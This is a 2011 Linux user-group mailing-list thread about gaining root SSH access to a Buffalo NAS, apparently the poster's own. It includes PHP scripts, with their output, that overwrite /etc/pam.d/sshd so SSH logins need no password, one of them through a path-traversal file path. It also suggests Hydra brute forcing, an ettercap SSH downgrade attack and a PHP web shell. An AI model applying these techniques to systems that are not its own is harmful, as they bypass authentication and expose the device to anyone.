On Mon, Jul 18, 2011 at 10:06 PM, Dan Dubovik <dandubo@gmail.com> wrote:

Can you SSH as the hammerhead user?

No
mark@orca:~/Desktop/buffalo_nas$ ssh hammerhead@xxx.xxx.xxx.xxx
Password:
Connection to xxx.xxx.xxx.xxx closed by remote host.
Connection to xxx.xxx.xxx.xxx closed.

When you FTP as the hammerhead user, can you move the script.php file to the htdocs directory? It has 777 permissions, so should be able to open it / drop a file there.

Yes, I can, and it does execute.

If you can get a PHP file uploaded and able to execute properly, perhaps a PHP based shell could help?

I am not a php guy.....I don't know how to do this.

I tried a script to allow ssh without password for anyone. It seems to have written the file, however, I still cannot ssh in as root. Note: this is my first php script; the pint statements helped me debug and see if it was working.

<?php
echo "starting... ";
$filename = '/etc/pam.d/sshd';
$fh = fopen($filename, 'w+') or die("can't open file");
$contents = fread($fh, 1000);
echo "..file contents: $contents ";

$stringData = "account required pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
 echo "...#1 no luck writing file ";
else
 echo "...wrote $fw bytes: '$stringData' ";

$stringData = "session required pam_unix.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
 echo "...#2 no luck writing file ";
else
 echo "...wrote $fw bytes: '$stringData' ";

$stringData = "auth required pam_permit.so\n";
$fw = fwrite($fh, $stringData);
if ($fw == false)
 echo "...#3 no luck writing file ";
else
 echo "...wrote $fw bytes: '$stringData' ";

rewind($fh);
$contents = fread($fh, 1000);
echo "...final file contents: $contents ";

fclose($fh);
echo "done! ";
?>

Output from the script:
starting...
..file contents:

...wrote 32 bytes: 'account required pam_unix.so '
...wrote 32 bytes: 'session required pam_unix.so '
...wrote 28 bytes: 'auth required pam_permit.so '
...final file contents:
account required pam_unix.so session required pam_unix.so auth required pam_permit.so
done!

One strange behavior....when I re-run the script, I expected to see the contents of the file displayed after 'starting...' above, but it always comes back blank, and I still cannot login using ssh....

I did this:
1. restart the nas
2. run script
3. I get this ouput:
mark@orca:~/Desktop/buffalo_nas$ ssh root@xxx.xxx.xxx.xxx
Connection closed by xxx.xxx.xxx.xxx

4. reset nas again
5 I get this ouput:
mark@orca:~/Desktop/buffalo_nas$ ssh root@xxx.xxx.xxx.xxx
Password:
Password:
Password:

Then all I get when I try to ssh in is Connection closed.

Does anyone have any php scripts to hack this box and give me root access via ssh?

Thanks!

Mark

-- Dan.
On Mon, Jul 18, 2011 at 9:20 PM, Lisa Kachold <lisakachold@obnosis.com> wrote:
I believe the script.php has to be moved the webroot directory and given permissions there I believe, but well if you can't get a login via ssh... -- how to do it?
On Sun, Jul 17, 2011 at 8:58 AM, Mark Phillips <mark@phillipsmarketing.biz> wrote:
On Sun, Jul 17, 2011 at 3:54 AM, Lisa Kachold <lisakachold@obnosis.com> wrote:

There are alot of password files and dictionary lists on various sites. Backtrack5 contains a good number.

But I imagine that it's either not allowing root via ssh or you have the wrong username.

It turns out the box is smarter than a fifth grader.....after a few hydra attacks, it started rejecting all the hydra attempts to ssh in via root. Once I stopped hydra (after running all night), it took a couple of hours before it would respond to ssh attempts from root. It now will ask for the root password, but I still have no idea what it is.

Or it's a truely random string.
It could be....the password for the zip file to unzip the file system is
 YvSInIQopeipx66t_DCdfEvfP47qeVPhNhAuSYmA4
. Someone retrieved it using a disassembler on the file system.

I did some more reading, and one person was able to use php to allow ssh login. The box allows one to create a web space, and it comes with php installed. One can edit the php.ini file, and I can upload via ftp a php script. The script they suggested is:
<?php
$file = '../../../../etc/pam.d/sshd';
$fh=fopen($file, 'w') or die("can't open file");
$stringData = "account required pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "session required pam_unix.so\n";
fwrite($fh, $stringData);
$stringData = "auth required pam_permit.so\n";
fwrite($fh, $stringData);
fclose($fh);
?>

I uploaded the script, but I get a 404 File not Found when I access the page. I thought it might be a file permission error since the file is only rw. I tried chmod 777 at the ftp prompt, and got the error message File not Found, but ls shows it is there.

ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 apache apache 6 Jul 17 08:23 cgi-bin
drwxrwxrwx 2 apache apache 22 Jul 17 08:23 htdocs
drwxrwxrwx 2 apache apache 39 Jul 17 08:23 log
-rw-rw-rw- 1 hammerhead hdusers 335 Jul 17 08:49 script.php
226 Transfer complete
ftp> chmod 777 script.php
550 CHMOD 777 script.php: No such file or directory
ftp>

Is there anything I can change in the php.ini file to make this script execute? Or, am I missing something else?

BTW, I cannot ftp as root, but I can ftp as a user I created, hammerhead.

Thanks,

Mark
On Fri, Jul 15, 2011 at 10:33 PM, Mark Phillips <mark@phillipsmarketing.biz> wrote:

Since this is a drive buffalo, I might try ettercap ssh downgrade attack:

http://openmaniak.com/ettercap_filter.php
ttp://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade

Not sure how a man in the middle attack will work, since I don't know the password to begin with...

Or Hydra:

Hydra Instructions:

http://www.youtube.com/watch?v=7CP-JB4QARo

Hydra is promising. I tried it with the common passwords list from openwall. No luck. Do you have any better password lists?

Thanks,

Mark

---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

--
(602) 791-8002 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice

HomeSmartInternational.com

---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
--
(602) 791-8002 Android
(623) 239-3392 Skype
(623) 688-3392 Google Voice

HomeSmartInternational.com
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss